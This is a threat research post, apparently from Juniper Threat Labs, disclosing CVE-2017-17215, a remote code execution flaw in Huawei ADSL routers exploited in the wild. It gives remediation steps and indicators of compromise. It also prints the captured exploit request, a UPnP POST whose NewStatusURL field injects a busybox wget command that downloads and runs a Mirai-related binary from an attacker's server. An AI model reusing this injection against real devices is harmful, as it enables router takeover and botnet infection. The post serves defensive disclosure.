Threat Research
Stay on top of the latest threat research, information on in-the-wild cyber attacks and cyber operations from Juniper Threat Labs.
Juniper Employee , Juniper Employee Juniper Employee
Threat Research
Remote Code Execution Vulnerability on Huawei Devices
01.17.18

ThinkstockPhotos-521971823_JNet.png 

On November 27, 2017, Juniper Threat Labs discovered a severe vulnerability in select Huawei devices that was being exploited in the wild. This vulnerability gives an attacker remote code execution capability. After due analysis and confirming this was not a previously known vulnerability, Juniper disclosed the issue to Huawei on November 29 and waited for Huawei to provide a patch for the vulnerability. This vulnerability has been since labeled as CVE-2017-17215. Huawei confirmed that Check Point Software Technologies independently notified them of the same vulnerability. The devices concerned are listed on Huawei’s web site at http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en.

 

Based on our observations, the beginning of this attack coincided with the U.S. Thanksgiving holiday on November 23. Usually holidays are a prime target for cyber attacks as more people browse the web and fewer security professionals are monitoring the networks.

The attack seemed to target Huawei’s ADSL routers. It used a specific HTTP POST command and parameters to trigger execution of a shell command on the UPnP port of the device. This zero-day vulnerability was used to run a script that downloads a payload from a hardcoded IP address and executes it.

 

Below is a capture that took place on November 23, 2017 at 2:33:58 AM.

 

TtafficCapture.png

 

These attacks, as there were many of them, all originated from three IP addresses:

172.106.110.90

172.93.97.219

198.7.59.177

These IP addresses were scanning internet-facing IPs on port 37215 and attempting the POST command below:

 

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

Content-Length: 452

User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64

Connection: keep-alive

Accept: */*

Accept-Encoding: gzip, deflate

<?xml version="1.0" ?>

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">

<NewStatusURL>$(busybox wget -g 172.93.97[.]219 -l /tmp/rsh -r /okiru.mips ;chmod +x /tmp/rsh ;/tmp/rsh)</NewStatusURL>

<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>

</u:Upgrade>

</s:Body>

</s:Envelope>

 

As you can see from the capture above, the CnC server is hosted on 172.93.97.219.

 

We obtained three different payloads from this site. All are Linux binaries that seem to be Mirai-related. One binary has zero VT detections, while the second had one initial detections, and the third had two initial detections (then six after rescan).

 

When executed, these binaries connect to their CnC at control.almashosting[.]ru, which happens to resolve to the same IP address as the original download site at 172.93.97[.]219.

Remediation

To protect your devices from this type of attack, you should follow the below protocols:

 

  1.     If not required, do not expose an open port 37215 to the internet. The easiest way is to disable UPnP on Huawei devices.
  2.     Apply a patch from Huawei.

 

Additional mitigation steps are listed on Huawei’s security advisory page mentioned above.

 

IOCs

Binary payload Hashes:

  • 5d4845344fde62b312cf1497e2885f98a5b3b97ee8a619ac67c2706bb68f8215
  • a6333e5c8be5da00c3e223687a1de3816ad8dbcc164583209ead452df3727a59

 

CnC

  • control.almashosting[.]ru
  • 172.106.110.90
  • 172.93.97.219
  • 198.7.59.177

 

Top Kudoed Authors